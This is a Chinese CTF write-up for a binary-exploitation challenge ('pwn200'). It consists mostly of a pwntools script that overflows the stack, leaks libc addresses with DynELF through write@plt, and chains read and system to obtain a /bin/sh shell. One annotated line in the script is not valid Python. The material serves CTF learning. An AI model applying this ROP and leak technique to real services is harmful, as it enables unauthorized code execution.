一道三无的题(无libc无system无/bin/sh)
利用pwntools的DynELF框架(专门解决泄露远程服务器libc的)
注:
1.要是看不懂参考上一篇简书:https://www.jianshu.com/p/590bc1d6c292
2.write 泄露地址是最好说话的
EXP
#!/usr/bin/python
#coding:utf-8
from pwn import*
p = process('./pwn200')
elf = ELF("./pwn200")
write_plt_addr = elf.plt['write'] ##elf.plt = elf.symbols
read_plt_addr = elf.plt['read']
print "[+]write_plt_addr:" + hex(write_plt_addr)
print "[+]read_plt_addr:" + hex(read_plt_addr)
start_addr = 0x80483D0 ##这里可以改为main 也可以是main函数所在的外置函数(作用是刷新程序,可以不断的去泄露目标地址)
pop3_ret_addr = 0x804856c (pop3 这里用到了先清空数据,然后写入write,以后脚本可以添加进去)
bss_addr = 0x804A020 ##注意这个地方是我们将/bin/sh放入的地方 bss date 大于地址边缘也ok (开启了nx说的是栈里面不可写数据)
def leak(addr):
# payload = ''
##读走之前的数据,防止待泄露的数>据被污染
p.recvline() #这里是一个难点 我一直都是直接构造,发现一直报错,
payload = "A"*112
payload += p32(write_plt_addr)
payload += p32(pop3_ret_addr)
payload += p32(1)
payload += p32(addr)
payload += p32(4)
payload += p32(start_addr)
p.send(payload)
content = p.recv(4)
print ("%#x -> %s" % (addr,(content or '').encode('hex')))
return content
d = DynELF(leak, elf = elf)
print "******************************"
system_addr = d.lookup('system','libc')
log.info("system_addr = %#x",system_addr)
print "******************************"
payload = ''
payload += 'A'*112
payload += p32(read_plt_addr)
payload += p32(pop3_ret_addr)
payload += p32(0)
payload += p32(bss_addr)
payload += p32(8)
payload += p32(system_addr)
payload += p32(0)
payload += p32(bss_addr)
p.sendline(payload)
p.sendline('/bin/sh\x00')
p.interactive()
网友评论